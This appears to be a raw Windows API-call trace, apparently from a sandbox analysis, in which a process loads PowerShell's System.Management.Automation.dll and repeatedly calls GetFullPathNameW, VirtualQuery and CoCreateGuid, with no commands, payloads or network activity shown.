	[0145.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.963] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.964] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.965] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.965] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.965] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.966] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.966] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.966] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.967] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.967] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.967] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.967] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.968] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.968] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.968] VirtualQuery (in: lpAddress=0x1cb500, lpBuffer=0x1cc3c0, dwLength=0x30 | out: lpBuffer=0x1cc3c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.969] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.969] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.969] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.970] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.970] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x2b8818a2, Data2=0x93, Data3=0x4cb9, Data4=([0]=0xa8, [1]=0x23, [2]=0xd2, [3]=0xb0, [4]=0x9e, [5]=0x95, [6]=0x22, [7]=0x56))) returned 0x0
	[0145.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.971] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x774c5922, Data2=0x22a7, Data3=0x4764, Data4=([0]=0x80, [1]=0xea, [2]=0x7a, [3]=0xaa, [4]=0x16, [5]=0x4c, [6]=0x13, [7]=0xb7))) returned 0x0
	[0145.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.975] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.975] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.976] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.976] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.976] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
